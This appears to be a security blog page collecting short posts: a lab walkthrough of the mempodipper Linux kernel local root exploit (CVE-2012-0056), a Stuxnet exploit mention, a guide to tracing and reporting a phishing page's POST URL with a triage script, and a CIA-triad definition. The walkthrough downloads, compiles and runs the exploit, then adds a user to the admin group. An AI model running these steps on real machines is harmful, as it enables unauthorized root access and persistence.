This is a digital forensics report I did for my digital forensics module; it covers crime scene investigation and imaging of evidence.
It follows the ACPO guidelines so that all evidence is admissible in court.
This is a walkthrough of using the recent Linux local root exploit for kernels >=2.6.39, 32-bit and 64-bit, by zx2c4.
First you need to check which kernel the box is running.
# uname -r
In my case this was BackTrack 5, which is based on Ubuntu and uses kernel 2.6.39.4, which is vulnerable.
I then added a normal user that I would use for the demo.
# useradd test
I then logged back in with the test account.
Then I checked what privileges the account had.
# groups test
This showed that test was not a root-enabled account.
I then moved to the Desktop.
# cd ~/Desktop
I then made a folder to store the exploit source in.
# mkdir mempodipper
Then I moved into the mempodipper directory.
# cd mempodipper
Then I downloaded the exploit source from the author's git repository.
# wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
Then compiled it.
# gcc mempodipper.c -w -o mempodipper
Then ran it.
# ./mempodipper
It then printed the exploit's output; it was successful, as it gave me a root shell.
# whoami
This returned root, confirming that it worked.
I then added the test user to the admin group.
# sudo adduser test admin
Adding user `test' to group `admin' ...
Adding user test to group admin
Done.
So from a plain test account you have obtained a full root account 😀
Then I verified that the user had really been added to the admin group.
# groups test
Source used to make this post, with an in-depth technical explanation of the exploit: http://blog.zx2c4.com/749
This is a demo of CVE-2010-2568 from my talk on Stuxnet.
CVE-2010-2568 was the exploit Stuxnet used to spread itself.
Watch in HD
Most fake emails are fairly easy to spot; others are written to play on people's fear of authority or on threats of account cancellation.
Quite a lot of new phishing emails are sent with an HTML page attached, so that when the victim opens it there is no suspicious URL in the address bar, because the file is local. The page then posts the form data to the attacker's URL.
This also makes detecting and reporting these emails slightly harder, as the POST URL is usually obfuscated.
The POST URL can be found easily with the Firefox add-on TamperData.
First, open the spam message or web page you wish to find the POST target for.
The email I received is a Hotmail account phishing email.
Second, make sure all other tabs are closed. Then start TamperData (Tools –> Tamper Data –> Start Tamper). Input some fake data and submit.
You can now see the exact place where the data is being posted.
Sometimes spammers run many different phishing sites with one central place to collect the accounts, so make sure you report the right URL so the phisher can be stopped.
The next step is to report the URL to Google: HERE
Next, report it to Microsoft. This has to be done from within IE 7/8: visit the URL,
then Settings –> Safety –> Report Unsafe Website.
Then do a who.is (whois) lookup to see who is hosting the domain, so that they can be informed of the abuse.
In the example the domain is iserver.net, which is hosted by an Australian company. I then reported the phishing page thelaun9.iserver.net/mys/index.php and, to prove it is being used for phishing, the page where all the stolen data is collected, thelaun9.iserver.net/mys/conf.php.
If more people report phishing emails it will help make the web a safer place.
Update: the site is now blocked in Firefox / Chrome after I reported it.
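When the phish arrives as a local HTML attachment, the POST target can also be pulled out offline without opening the page in a browser. The script below is an added example (not part of the original post); it parses the attachment's forms, lists the credential fields they harvest, and flags any form whose action points at a remote host. The sample HTML and the phish.example.invalid host are constructed for the demo.

```python
"""Triage an HTML phishing attachment offline: find each form, the URL it
posts to, and the input fields it harvests, so the right URL gets reported."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormExtractor(HTMLParser):
    """Collect <form> action/method and the named inputs inside each form."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute values may be None for bare attributes
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "get").lower(),
                             "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "text").lower() != "submit":
                self._current["fields"].append(a.get("name") or "?")

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def extract_post_targets(html):
    """Return one dict per form; 'remote' is True when the action names a host
    other than the local file (an absolute URL), which is the phisher's drop."""
    parser = FormExtractor()
    parser.feed(html)
    for form in parser.forms:
        host = urlparse(form["action"]).hostname
        form["host"] = host
        form["remote"] = host is not None  # relative action => stays local
    return parser.forms


# Constructed sample of a "verify your account" attachment (not a real phish).
SAMPLE = """<html><body><h1>Hotmail - verify your account</h1>
<form method="POST" action="http://phish.example.invalid/mys/index.php">
Email: <input type="text" name="login"> Password: <input type="password" name="passwd">
<input type="submit" value="Sign in"></form></body></html>"""

if __name__ == "__main__":
    for form in extract_post_targets(SAMPLE):
        print(form["method"].upper(), "->", form["action"], "fields:", form["fields"])
```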
The CIA triangle stands for confidentiality, integrity and availability. These represent the aims of information security.
Confidentiality is preventing unauthorized access to data.
Integrity is preventing the unauthorized modification of data.
Availability is preventing unauthorized denial of access to data, so that it is there when legitimate users need it.